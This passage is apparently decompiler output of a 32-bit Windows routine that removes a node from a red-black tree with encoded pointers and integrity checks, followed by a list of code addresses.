                                                                      					if(_t393 != 0) {
                                                                      						_t393 = _t393 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_t426 = _t393;
                                                                      				if(_t452 != 0) {
                                                                      					_t426 = _t452;
                                                                      				}
                                                                      				_v5 = _t285 & 0x00000001;
                                                                      				asm("sbb eax, eax");
                                                                      				if((_t393 &  ~_t452) != 0) {
                                                                      					_t289 = _t393;
                                                                      					_t427 = _v5;
                                                                      					_t422 = _t393;
                                                                      					_v12 = _t393;
                                                                      					_v16 = 1;
                                                                      					if( *_t393 != 0) {
                                                                      						_v16 = _v16 & 0x00000000;
                                                                      						_t445 =  *_t393;
                                                                      						goto L115;
                                                                      						L116:
                                                                      						_t289 = _t445;
                                                                      						L117:
                                                                      						_t445 =  *_t289;
                                                                      						if(_t445 != 0) {
                                                                      							L115:
                                                                      							_t422 = _t289;
                                                                      							if(_t427 != 0) {
                                                                      								goto L183;
                                                                      							}
                                                                      							goto L116;
                                                                      						} else {
                                                                      							_t444 = _a8;
                                                                      							_v12 = _t289;
                                                                      							goto L27;
                                                                      						}
                                                                      						L183:
                                                                      						if(_t445 == 0) {
                                                                      							goto L116;
                                                                      						}
                                                                      						_t289 = _t289 ^ _t445;
                                                                      						goto L117;
                                                                      					}
                                                                      					L27:
                                                                      					if(_t427 != 0) {
                                                                      						if(_t452 == 0) {
                                                                      							goto L28;
                                                                      						}
                                                                      						_t428 = _t289 ^ _t452;
                                                                      						L29:
                                                                      						 *_t289 = _t428;
                                                                      						_t429 =  *(_t452 + 8);
                                                                      						_v20 = _t429;
                                                                      						_t426 = _t429 & 0xfffffffc;
                                                                      						_t292 =  *(_a4 + 4) & 0x00000001;
                                                                      						_v6 = _t292;
                                                                      						_t293 = _v12;
                                                                      						if(_t292 != 0) {
                                                                      							if(_t426 != 0) {
                                                                      								_t426 = _t426 ^ _t452;
                                                                      							}
                                                                      						}
                                                                      						if(_t426 != _t444) {
                                                                      							L174:
                                                                      							_t423 = 0x1d;
                                                                      							asm("int 0x29");
                                                                      							goto L175;
                                                                      						} else {
                                                                      							_t436 = _t293;
                                                                      							if(_v6 != 0) {
                                                                      								_t436 = _t436 ^ _t452;
                                                                      							}
                                                                      							_v20 = _v20 & 0x00000003;
                                                                      							_v20 = _v20 | _t436;
                                                                      							 *(_t452 + 8) = _v20;
                                                                      							_t426 =  *(_t393 + 8) & 0xfffffffc;
                                                                      							_t356 =  *(_a4 + 4) & 0x00000001;
                                                                      							_v6 = _t356;
                                                                      							_t357 = _v12;
                                                                      							if(_t356 != 0) {
                                                                      								if(_t426 != 0) {
                                                                      									_t426 = _t426 ^ _t393;
                                                                      								}
                                                                      							}
                                                                      							if(_t426 != _t444) {
                                                                      								goto L174;
                                                                      							} else {
                                                                      								_t483 = _t393 ^ _t357;
                                                                      								_v24 = _t483;
                                                                      								if(_v6 == 0) {
                                                                      									_v24 = _t357;
                                                                      								}
                                                                      								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
                                                                      								_t426 =  *(_t357 + 4);
                                                                      								_t444 = _a8;
                                                                      								_t359 =  *(_a4 + 4) & 0x00000001;
                                                                      								_v6 = _t359;
                                                                      								_t360 = _v12;
                                                                      								_v24 = _t483;
                                                                      								if(_t359 != 0) {
                                                                      									_v24 = _t483;
                                                                      									if(_t426 == 0) {
                                                                      										goto L37;
                                                                      									}
                                                                      									_t426 = _t426 ^ _t360;
                                                                      									L38:
                                                                      									if(_v6 == 0) {
                                                                      										_t483 = _t393;
                                                                      									}
                                                                      									_t413 =  *(_t360 + 8);
                                                                      									 *(_t360 + 4) = _t483;
                                                                      									_t452 = _t413 & 0xfffffffc;
                                                                      									_v5 = _t413;
                                                                      									_t363 =  *(_a4 + 4) & 0x00000001;
                                                                      									_v6 = _t363;
                                                                      									if(_t363 != 0) {
                                                                      										_t364 = _v12;
                                                                      										_v5 = _t413;
                                                                      										if(_t452 == 0) {
                                                                      											goto L41;
                                                                      										}
                                                                      										_v20 = _t452;
                                                                      										_v20 = _v20 ^ _t364;
                                                                      										L42:
                                                                      										if(_v20 != _t422) {
                                                                      											_v5 = _t413;
                                                                      											if(_v6 == 0) {
                                                                      												L199:
                                                                      												_t366 = _v12;
                                                                      												L200:
                                                                      												if(_t452 != 0 || _t366 != _t422) {
                                                                      													goto L174;
                                                                      												} else {
                                                                      													goto L43;
                                                                      												}
                                                                      											}
                                                                      											_t366 = _v12;
                                                                      											_v5 = _t413;
                                                                      											if(_t452 == 0) {
                                                                      												goto L199;
                                                                      											}
                                                                      											_t452 = _t452 ^ _t366;
                                                                      											goto L200;
                                                                      										}
                                                                      										L43:
                                                                      										_t486 =  *(_t444 + 8) & 0xfffffffc;
                                                                      										if(_v6 != 0) {
                                                                      											if(_t486 != 0) {
                                                                      												_t486 = _t486 ^ _t444;
                                                                      											}
                                                                      											if(_v6 != 0 && _t486 != 0) {
                                                                      												_t486 = _t486 ^ _t366;
                                                                      											}
                                                                      										}
                                                                      										_t415 = _t413 & 0x00000003 | _t486;
                                                                      										 *(_t366 + 8) = _t415;
                                                                      										_t416 = _v12;
                                                                      										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
                                                                      										_t452 =  *(_t444 + 8);
                                                                      										_t372 = _a4;
                                                                      										if((_t452 & 0xfffffffc) == 0) {
                                                                      											if( *_t372 != _t444) {
                                                                      												goto L174;
                                                                      											} else {
                                                                      												 *_t372 = _t416;
                                                                      												goto L52;
                                                                      											}
                                                                      										} else {
                                                                      											_t452 = _t452 & 0xfffffffc;
                                                                      											_t378 = _t372[1] & 0x00000001;
                                                                      											_v6 = _t378;
                                                                      											if(_t378 != 0) {
                                                                      												if(_t452 != 0) {
                                                                      													_t452 = _t452 ^ _t444;
                                                                      												}
                                                                      											}
                                                                      											_t379 =  *(_t452 + 4);
                                                                      											if(_v6 != 0) {
                                                                      												if(_t379 != 0) {
                                                                      													_t379 = _t379 ^ _t452;
                                                                      												}
                                                                      											}
                                                                      											_v24 = _t379;
                                                                      											_t382 = _t452 + (0 | _v24 == _t444) * 4;
                                                                      											_v28 = _t382;
                                                                      											_t383 =  *_t382;
                                                                      											if(_v6 != 0) {
                                                                      												if(_t383 != 0) {
                                                                      													_t383 = _t383 ^ _t452;
                                                                      												}
                                                                      											}
                                                                      											if(_t383 != _t444) {
                                                                      												goto L174;
                                                                      											} else {
                                                                      												if(_v6 != 0) {
                                                                      													_t487 = _t452 ^ _t416;
                                                                      												} else {
                                                                      													_t487 = _t416;
                                                                      												}
                                                                      												 *_v28 = _t487;
                                                                      												L52:
                                                                      												_t373 = _v5;
                                                                      												L12:
                                                                      												_t452 = _a4;
                                                                      												_v5 = _t373 & 0x00000001;
                                                                      												if(( *(_t452 + 4) & 0x00000001) != 0) {
                                                                      													if(_t426 == 0) {
                                                                      														goto L13;
                                                                      													}
                                                                      													_t306 = _t422 ^ _t426;
                                                                      													L14:
                                                                      													_t444 = _v16;
                                                                      													 *(_t422 + _t444 * 4) = _t306;
                                                                      													if(_t426 != 0) {
                                                                      														_t306 =  *(_t426 + 8) & 0xfffffffc;
                                                                      														_t418 =  *(_t452 + 4) & 0x00000001;
                                                                      														_v6 = _t418;
                                                                      														_t419 = _v12;
                                                                      														if(_t418 != 0) {
                                                                      															if(_t306 != 0) {
                                                                      																_t306 = _t306 ^ _t426;
                                                                      															}
                                                                      														}
                                                                      														if(_t306 != _t419) {
                                                                      															goto L174;
                                                                      														} else {
                                                                      															if(_v6 != 0) {
                                                                      																if(_t422 != 0) {
                                                                      																	_t422 = _t422 ^ _t426;
                                                                      																}
                                                                      															}
                                                                      															 *(_t426 + 8) = _t422;
                                                                      															L24:
                                                                      															return _t306;
                                                                      														}
                                                                      													}
                                                                      													if(_v5 != _t426) {
                                                                      														goto L24;
                                                                      													} else {
                                                                      														_t395 = _t452;
                                                                      														_t306 =  *(_t395 + 4);
                                                                      														L17:
                                                                      														_t446 = _t423;
                                                                      														_t434 = _v16 ^ 0x00000001;
                                                                      														_v24 = _t446;
                                                                      														_v12 = _t434;
                                                                      														_t452 =  *(_t423 + _t434 * 4);
                                                                      														if((_t306 & 0x00000001) != 0) {
                                                                      															if(_t452 == 0) {
                                                                      																goto L18;
                                                                      															}
                                                                      															_t426 = _t452 ^ _t446;
                                                                      															L19:
                                                                      															if(( *(_t426 + 8) & 0x00000001) != 0) {
                                                                      																_t310 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																_t444 = _t306 & 1;
                                                                      																if(_t444 != 0) {
                                                                      																	if(_t310 != 0) {
                                                                      																		_t310 = _t310 ^ _t426;
                                                                      																	}
                                                                      																}
                                                                      																if(_t310 != _t423) {
                                                                      																	goto L174;
                                                                      																} else {
                                                                      																	if(_t444 != 0) {
                                                                      																		if(_t452 != 0) {
                                                                      																			_t452 = _t452 ^ _t423;
                                                                      																		}
                                                                      																	}
                                                                      																	if(_t452 != _t426) {
                                                                      																		goto L174;
                                                                      																	} else {
                                                                      																		_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																		if(_t444 != 0) {
                                                                      																			if(_t452 == 0) {
                                                                      																				L170:
                                                                      																				if( *_t395 != _t423) {
                                                                      																					goto L174;
                                                                      																				} else {
                                                                      																					 *_t395 = _t426;
                                                                      																					L140:
                                                                      																					if(_t444 != 0) {
                                                                      																						if(_t452 != 0) {
                                                                      																							_t452 = _t452 ^ _t426;
                                                                      																						}
                                                                      																					}
                                                                      																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                      																					_t300 =  *(_t426 + _v16 * 4);
                                                                      																					if(_t444 != 0) {
                                                                      																						if(_t300 == 0) {
                                                                      																							goto L143;
                                                                      																						}
                                                                      																						_t300 = _t300 ^ _t426;
                                                                      																						goto L142;
                                                                      																					} else {
                                                                      																						L142:
                                                                      																						if(_t300 != 0) {
                                                                      																							_t401 =  *(_t300 + 8);
                                                                      																							_t452 = _t401 & 0xfffffffc;
                                                                      																							if(_t444 != 0) {
                                                                      																								if(_t452 != 0) {
                                                                      																									_t452 = _t452 ^ _t300;
                                                                      																								}
                                                                      																							}
                                                                      																							if(_t452 != _t426) {
                                                                      																								goto L174;
                                                                      																							} else {
                                                                      																								if(_t444 != 0) {
                                                                      																									_t481 = _t300 ^ _t423;
                                                                      																								} else {
                                                                      																									_t481 = _t423;
                                                                      																								}
                                                                      																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
                                                                      																								goto L143;
                                                                      																							}
                                                                      																						}
                                                                      																						L143:
                                                                      																						if(_t444 != 0) {
                                                                      																							if(_t300 != 0) {
                                                                      																								_t300 = _t300 ^ _t423;
                                                                      																							}
                                                                      																						}
                                                                      																						 *(_t423 + _v12 * 4) = _t300;
                                                                      																						_t454 = _t426;
                                                                      																						if(_t444 != 0) {
                                                                      																							_t455 = _t454 ^ _t423;
                                                                      																							_t301 = _t455;
                                                                      																						} else {
                                                                      																							_t301 = _t423;
                                                                      																							_t455 = _t454 ^ _t301;
                                                                      																						}
                                                                      																						 *(_t426 + _v16 * 4) = _t301;
                                                                      																						_t395 = _a4;
                                                                      																						if(_t444 == 0) {
                                                                      																							_t455 = _t426;
                                                                      																						}
                                                                      																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
                                                                      																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
                                                                      																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
                                                                      																						_t426 =  *(_t423 + _v12 * 4);
                                                                      																						_t306 =  *(_t395 + 4);
                                                                      																						if((_t306 & 0x00000001) != 0) {
                                                                      																							if(_t426 != 0) {
                                                                      																								_t426 = _t426 ^ _t423;
                                                                      																							}
                                                                      																						}
                                                                      																						_t446 = _v24;
                                                                      																						goto L20;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			_t452 = _t452 ^ _t423;
                                                                      																		}
                                                                      																		if(_t452 == 0) {
                                                                      																			goto L170;
                                                                      																		}
                                                                      																		_t311 =  *(_t452 + 4);
                                                                      																		if(_t444 != 0) {
                                                                      																			if(_t311 != 0) {
                                                                      																				_t311 = _t311 ^ _t452;
                                                                      																			}
                                                                      																		}
                                                                      																		if(_t311 == _t423) {
                                                                      																			if(_t444 != 0) {
                                                                      																				L175:
                                                                      																				_t295 = _t452 ^ _t426;
                                                                      																				goto L169;
                                                                      																			} else {
                                                                      																				_t295 = _t426;
                                                                      																				L169:
                                                                      																				 *(_t452 + 4) = _t295;
                                                                      																				goto L140;
                                                                      																			}
                                                                      																		} else {
                                                                      																			_t312 =  *_t452;
                                                                      																			if(_t444 != 0) {
                                                                      																				if(_t312 != 0) {
                                                                      																					_t312 = _t312 ^ _t452;
                                                                      																				}
                                                                      																			}
                                                                      																			if(_t312 != _t423) {
                                                                      																				goto L174;
                                                                      																			} else {
                                                                      																				if(_t444 != 0) {
                                                                      																					_t314 = _t452 ^ _t426;
                                                                      																				} else {
                                                                      																					_t314 = _t426;
                                                                      																				}
                                                                      																				 *_t452 = _t314;
                                                                      																				goto L140;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L20:
                                                                      															_t456 =  *_t426;
                                                                      															_t307 = _t306 & 0x00000001;
                                                                      															if(_t456 != 0) {
                                                                      																if(_t307 != 0) {
                                                                      																	_t456 = _t456 ^ _t426;
                                                                      																}
                                                                      																if(( *(_t456 + 8) & 0x00000001) == 0) {
                                                                      																	goto L21;
                                                                      																} else {
                                                                      																	L56:
                                                                      																	_t461 =  *(_t426 + _v12 * 4);
                                                                      																	if(_t307 != 0) {
                                                                      																		if(_t461 == 0) {
                                                                      																			L59:
                                                                      																			_t462 = _v16;
                                                                      																			_t444 =  *(_t426 + _t462 * 4);
                                                                      																			if(_t307 != 0) {
                                                                      																				if(_t444 != 0) {
                                                                      																					_t444 = _t444 ^ _t426;
                                                                      																				}
                                                                      																			}
                                                                      																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
                                                                      																			_t452 = _t462 ^ 0x00000001;
                                                                      																			_t405 =  *(_t395 + 4) & 1;
                                                                      																			_t316 =  *(_t444 + 8) & 0xfffffffc;
                                                                      																			_v28 = _t405;
                                                                      																			_v24 = _t452;
                                                                      																			if(_t405 != 0) {
                                                                      																				if(_t316 != 0) {
                                                                      																					_t316 = _t316 ^ _t444;
                                                                      																				}
                                                                      																			}
                                                                      																			if(_t316 != _t426) {
                                                                      																				goto L174;
                                                                      																			} else {
                                                                      																				_t318 = _t452 ^ 0x00000001;
                                                                      																				_v32 = _t318;
                                                                      																				_t319 =  *(_t426 + _t318 * 4);
                                                                      																				if(_t405 != 0) {
                                                                      																					if(_t319 != 0) {
                                                                      																						_t319 = _t319 ^ _t426;
                                                                      																					}
                                                                      																				}
                                                                      																				if(_t319 != _t444) {
                                                                      																					goto L174;
                                                                      																				} else {
                                                                      																					_t320 =  *(_t423 + _t452 * 4);
                                                                      																					if(_t405 != 0) {
                                                                      																						if(_t320 != 0) {
                                                                      																							_t320 = _t320 ^ _t423;
                                                                      																						}
                                                                      																					}
                                                                      																					if(_t320 != _t426) {
                                                                      																						goto L174;
                                                                      																					} else {
                                                                      																						_t322 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																						if(_t405 != 0) {
                                                                      																							if(_t322 != 0) {
                                                                      																								_t322 = _t322 ^ _t426;
                                                                      																							}
                                                                      																						}
                                                                      																						if(_t322 != _t423) {
                                                                      																							goto L174;
                                                                      																						} else {
                                                                      																							_t464 = _t423 ^ _t444;
                                                                      																							_t323 = _t464;
                                                                      																							if(_t405 == 0) {
                                                                      																								_t323 = _t444;
                                                                      																							}
                                                                      																							 *(_t423 + _v24 * 4) = _t323;
                                                                      																							_t407 = _v28;
                                                                      																							if(_t407 != 0) {
                                                                      																								if(_t423 != 0) {
                                                                      																									L72:
                                                                      																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
                                                                      																									_t328 =  *(_t444 + _v24 * 4);
                                                                      																									if(_t407 != 0) {
                                                                      																										if(_t328 == 0) {
                                                                      																											L74:
                                                                      																											if(_t407 != 0) {
                                                                      																												if(_t328 != 0) {
                                                                      																													_t328 = _t328 ^ _t426;
                                                                      																												}
                                                                      																											}
                                                                      																											 *(_t426 + _v32 * 4) = _t328;
                                                                      																											_t467 = _t426 ^ _t444;
                                                                      																											_t329 = _t467;
                                                                      																											if(_t407 == 0) {
                                                                      																												_t329 = _t426;
                                                                      																											}
                                                                      																											 *(_t444 + _v24 * 4) = _t329;
                                                                      																											if(_v28 == 0) {
                                                                      																												_t467 = _t444;
                                                                      																											}
                                                                      																											_t395 = _a4;
                                                                      																											_t452 = _t426;
                                                                      																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
                                                                      																											_t426 = _t444;
                                                                      																											L80:
                                                                      																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
                                                                      																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
                                                                      																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
                                                                      																											_t337 =  *(_t426 + 8) & 0xfffffffc;
                                                                      																											_t444 =  *(_t395 + 4) & 1;
                                                                      																											if(_t444 != 0) {
                                                                      																												if(_t337 != 0) {
                                                                      																													_t337 = _t337 ^ _t426;
                                                                      																												}
                                                                      																											}
                                                                      																											if(_t337 != _t423) {
                                                                      																												goto L174;
                                                                      																											} else {
                                                                      																												_t339 =  *(_t423 + _v12 * 4);
                                                                      																												if(_t444 != 0) {
                                                                      																													if(_t339 != 0) {
                                                                      																														_t339 = _t339 ^ _t423;
                                                                      																													}
                                                                      																												}
                                                                      																												if(_t339 != _t426) {
                                                                      																													goto L174;
                                                                      																												} else {
                                                                      																													_t452 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																													if(_t444 != 0) {
                                                                      																														if(_t452 == 0) {
                                                                      																															L160:
                                                                      																															if( *_t395 != _t423) {
                                                                      																																goto L174;
                                                                      																															} else {
                                                                      																																 *_t395 = _t426;
                                                                      																																L93:
                                                                      																																if(_t444 != 0) {
                                                                      																																	if(_t452 != 0) {
                                                                      																																		_t452 = _t452 ^ _t426;
                                                                      																																	}
                                                                      																																}
                                                                      																																_t409 = _v16;
                                                                      																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                                                      																																_t343 =  *(_t426 + _t409 * 4);
                                                                      																																if(_t444 != 0) {
                                                                      																																	if(_t343 == 0) {
                                                                      																																		goto L96;
                                                                      																																	}
                                                                      																																	_t343 = _t343 ^ _t426;
                                                                      																																	goto L95;
                                                                      																																} else {
                                                                      																																	L95:
                                                                      																																	if(_t343 != 0) {
                                                                      																																		_t410 =  *(_t343 + 8);
                                                                      																																		_t452 = _t410 & 0xfffffffc;
                                                                      																																		if(_t444 != 0) {
                                                                      																																			if(_t452 != 0) {
                                                                      																																				_t452 = _t452 ^ _t343;
                                                                      																																			}
                                                                      																																		}
                                                                      																																		if(_t452 != _t426) {
                                                                      																																			goto L174;
                                                                      																																		} else {
                                                                      																																			if(_t444 != 0) {
                                                                      																																				_t474 = _t343 ^ _t423;
                                                                      																																			} else {
                                                                      																																				_t474 = _t423;
                                                                      																																			}
                                                                      																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
                                                                      																																			_t409 = _v16;
                                                                      																																			goto L96;
                                                                      																																		}
                                                                      																																	}
                                                                      																																	L96:
                                                                      																																	if(_t444 != 0) {
                                                                      																																		if(_t343 != 0) {
                                                                      																																			_t343 = _t343 ^ _t423;
                                                                      																																		}
                                                                      																																	}
                                                                      																																	 *(_t423 + _v12 * 4) = _t343;
                                                                      																																	if(_t444 != 0) {
                                                                      																																		_t345 = _t426 ^ _t423;
                                                                      																																		_t470 = _t345;
                                                                      																																	} else {
                                                                      																																		_t345 = _t423;
                                                                      																																		_t470 = _t426 ^ _t345;
                                                                      																																	}
                                                                      																																	 *(_t426 + _t409 * 4) = _t345;
                                                                      																																	if(_t444 == 0) {
                                                                      																																		_t470 = _t426;
                                                                      																																	}
                                                                      																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
                                                                      																																	 *(_t423 + 8) = _t306;
                                                                      																																	goto L24;
                                                                      																																}
                                                                      																															}
                                                                      																														}
                                                                      																														_t452 = _t452 ^ _t423;
                                                                      																													}
                                                                      																													if(_t452 == 0) {
                                                                      																														goto L160;
                                                                      																													}
                                                                      																													_t348 =  *(_t452 + 4);
                                                                      																													if(_t444 != 0) {
                                                                      																														if(_t348 != 0) {
                                                                      																															_t348 = _t348 ^ _t452;
                                                                      																														}
                                                                      																													}
                                                                      																													if(_t348 == _t423) {
                                                                      																														if(_t444 != 0) {
                                                                      																															_t350 = _t452 ^ _t426;
                                                                      																														} else {
                                                                      																															_t350 = _t426;
                                                                      																														}
                                                                      																														 *(_t452 + 4) = _t350;
                                                                      																														goto L93;
                                                                      																													} else {
                                                                      																														_t351 =  *_t452;
                                                                      																														if(_t444 != 0) {
                                                                      																															if(_t351 != 0) {
                                                                      																																_t351 = _t351 ^ _t452;
                                                                      																															}
                                                                      																														}
                                                                      																														if(_t351 != _t423) {
                                                                      																															goto L174;
                                                                      																														} else {
                                                                      																															if(_t444 != 0) {
                                                                      																																_t353 = _t452 ^ _t426;
                                                                      																															} else {
                                                                      																																_t353 = _t426;
                                                                      																															}
                                                                      																															 *_t452 = _t353;
                                                                      																															goto L93;
                                                                      																														}
                                                                      																													}
                                                                      																												}
                                                                      																											}
                                                                      																										}
                                                                      																										_t328 = _t328 ^ _t444;
                                                                      																									}
                                                                      																									if(_t328 != 0) {
                                                                      																										_t475 =  *(_t328 + 8);
                                                                      																										_v20 = _t475;
                                                                      																										_t452 = _t475 & 0xfffffffc;
                                                                      																										if(_t407 != 0) {
                                                                      																											if(_t452 != 0) {
                                                                      																												_t452 = _t452 ^ _t328;
                                                                      																											}
                                                                      																										}
                                                                      																										if(_t452 != _t444) {
                                                                      																											goto L174;
                                                                      																										} else {
                                                                      																											if(_t407 != 0) {
                                                                      																												_t477 = _t328 ^ _t426;
                                                                      																											} else {
                                                                      																												_t477 = _t426;
                                                                      																											}
                                                                      																											_v20 = _v20 & 0x00000003;
                                                                      																											_v20 = _v20 | _t477;
                                                                      																											 *(_t328 + 8) = _v20;
                                                                      																											goto L74;
                                                                      																										}
                                                                      																									}
                                                                      																									goto L74;
                                                                      																								}
                                                                      																							}
                                                                      																							_t464 = _t423;
                                                                      																							goto L72;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t452 = _t461 ^ _t426;
                                                                      																	}
                                                                      																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
                                                                      																		goto L59;
                                                                      																	} else {
                                                                      																		goto L80;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L21:
                                                                      															_t457 =  *(_t426 + 4);
                                                                      															if(_t457 != 0) {
                                                                      																if(_t307 != 0) {
                                                                      																	_t457 = _t457 ^ _t426;
                                                                      																}
                                                                      																if(( *(_t457 + 8) & 0x00000001) == 0) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      															L22:
                                                                      															_t308 =  *(_t423 + 8);
                                                                      															if((_t308 & 0x00000001) == 0) {
                                                                      																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                      																_t306 =  *(_t395 + 4);
                                                                      																_t431 =  *(_t423 + 8) & 0xfffffffc;
                                                                      																_t397 = _t306 & 0x00000001;
                                                                      																if(_t397 != 0) {
                                                                      																	if(_t431 == 0) {
                                                                      																		goto L110;
                                                                      																	}
                                                                      																	_t423 = _t423 ^ _t431;
                                                                      																	L111:
                                                                      																	if(_t423 == 0) {
                                                                      																		goto L24;
                                                                      																	}
                                                                      																	_t432 =  *(_t423 + 4);
                                                                      																	if(_t397 != 0) {
                                                                      																		if(_t432 != 0) {
                                                                      																			_t432 = _t432 ^ _t423;
                                                                      																		}
                                                                      																	}
                                                                      																	_v16 = 0 | _t432 == _t446;
                                                                      																	_t395 = _a4;
                                                                      																	goto L17;
                                                                      																}
                                                                      																L110:
                                                                      																_t423 = _t431;
                                                                      																goto L111;
                                                                      															} else {
                                                                      																_t306 = _t308 & 0x000000fe;
                                                                      																 *(_t423 + 8) = _t306;
                                                                      																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                                                      																goto L24;
                                                                      															}
                                                                      														}
                                                                      														L18:
                                                                      														_t426 = _t452;
                                                                      														goto L19;
                                                                      													}
                                                                      												}
                                                                      												L13:
                                                                      												_t306 = _t426;
                                                                      												goto L14;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									L41:
                                                                      									_t366 = _v12;
                                                                      									_v20 = _t452;
                                                                      									goto L42;
                                                                      								}
                                                                      								L37:
                                                                      								_t483 = _v24;
                                                                      								goto L38;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L28:
                                                                      					_t428 = _t452;
                                                                      					goto L29;
                                                                      				}
                                                                      				_t385 = _v5;
                                                                      				_t422 =  *(_t444 + 8) & 0xfffffffc;
                                                                      				if(_t385 != 0) {
                                                                      					if(_t422 != 0) {
                                                                      						_t422 = _t422 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_v12 = _t444;
                                                                      				if(_t422 == 0) {
                                                                      					if(_t426 != 0) {
                                                                      						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
                                                                      					}
                                                                      					_t425 = _a4;
                                                                      					if( *_t425 != _t444) {
                                                                      						goto L174;
                                                                      					} else {
                                                                      						_t425[4] = _t426;
                                                                      						_t306 = _t425[4] & 0x00000001;
                                                                      						if(_t306 != 0) {
                                                                      							_t425[4] = _t425[4] | 0x00000001;
                                                                      						}
                                                                      						 *_t425 = _t426;
                                                                      						goto L24;
                                                                      					}
                                                                      				} else {
                                                                      					_t452 =  *(_t422 + 4);
                                                                      					if(_t385 != 0) {
                                                                      						if(_t452 != 0) {
                                                                      							_t452 = _t452 ^ _t422;
                                                                      						}
                                                                      					}
                                                                      					if(_t452 == _t444) {
                                                                      						_v16 = 1;
                                                                      						L11:
                                                                      						_t373 =  *(_t444 + 8);
                                                                      						goto L12;
                                                                      					} else {
                                                                      						_t387 =  *_t422;
                                                                      						if(_v5 != 0) {
                                                                      							if(_t387 != 0) {
                                                                      								_t387 = _t387 ^ _t422;
                                                                      							}
                                                                      						}
                                                                      						if(_t387 != _t444) {
                                                                      							goto L174;
                                                                      						} else {
                                                                      							_t488 = _a4;
                                                                      							_v16 = _v16 & 0x00000000;
                                                                      							_t388 =  *(_t488 + 4);
                                                                      							_v24 = _t388;
                                                                      							if((_t388 & 0xfffffffe) == _t444) {
                                                                      								if(_t426 != 0) {
                                                                      									 *(_t488 + 4) = _t426;
                                                                      									if((_v24 & 0x00000001) != 0) {
                                                                      										_t390 = _t426;
                                                                      										L228:
                                                                      										 *(_t488 + 4) = _t390 | 0x00000001;
                                                                      									}
                                                                      									goto L11;
                                                                      								}
                                                                      								 *(_t488 + 4) = _t422;
                                                                      								if((_v24 & 0x00000001) == 0) {
                                                                      									goto L11;
                                                                      								} else {
                                                                      									_t390 = _t422;
                                                                      									goto L228;
                                                                      								}
                                                                      							}
                                                                      							goto L11;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      0x009ffafc
                                                                      0x009ffafc
                                                                      0x009ffafe
                                                                      0x009ffb01
                                                                      0x009ffb09
                                                                      0x009ffb0c
                                                                      0x009ffb12
                                                                      0x009ffb14
                                                                      0x009ffb17
                                                                      0x00a55dd6
                                                                      0x00a55dd9
                                                                      0x00a55dde
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55de4
                                                                      0x00a55de7
                                                                      0x009ffb29
                                                                      0x009ffb2c
                                                                      0x00a55df3
                                                                      0x00a55df6
                                                                      0x00a55e06
                                                                      0x00a55e0c
                                                                      0x00a55e0f
                                                                      0x00a55e11
                                                                      0x00000000
                                                                      0x00a55e1f
                                                                      0x00000000
                                                                      0x00a55e1f
                                                                      0x00a55e11
                                                                      0x00a55df8
                                                                      0x00a55dfb
                                                                      0x00a55e00
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55e02
                                                                      0x00000000
                                                                      0x00a55e02
                                                                      0x009ffb32
                                                                      0x009ffb35
                                                                      0x009ffb3c
                                                                      0x00a55e26
                                                                      0x00a55e28
                                                                      0x00a55e28
                                                                      0x00a55e2e
                                                                      0x00a55e3c
                                                                      0x00a55e3c
                                                                      0x00a55e2e
                                                                      0x009ffb45
                                                                      0x009ffb47
                                                                      0x009ffb53
                                                                      0x009ffb56
                                                                      0x009ffb59
                                                                      0x009ffb5c
                                                                      0x009ffb65
                                                                      0x00a0000d
                                                                      0x00000000
                                                                      0x00a0000f
                                                                      0x00a0000f
                                                                      0x00000000
                                                                      0x00a0000f
                                                                      0x009ffb6b
                                                                      0x009ffb6e
                                                                      0x009ffb71
                                                                      0x009ffb73
                                                                      0x009ffb76
                                                                      0x00a55e45
                                                                      0x00a55e4b
                                                                      0x00a55e4b
                                                                      0x00a55e45
                                                                      0x009ffb80
                                                                      0x009ffb83
                                                                      0x00a55e54
                                                                      0x00a55e5a
                                                                      0x00a55e5a
                                                                      0x00a55e54
                                                                      0x009ffb89
                                                                      0x009ffb98
                                                                      0x009ffb9b
                                                                      0x009ffb9e
                                                                      0x009ffba0
                                                                      0x00a55e63
                                                                      0x00a55e69
                                                                      0x00a55e69
                                                                      0x00a55e63
                                                                      0x009ffba8
                                                                      0x00000000
                                                                      0x009ffbae
                                                                      0x009ffbb2
                                                                      0x00a55e70
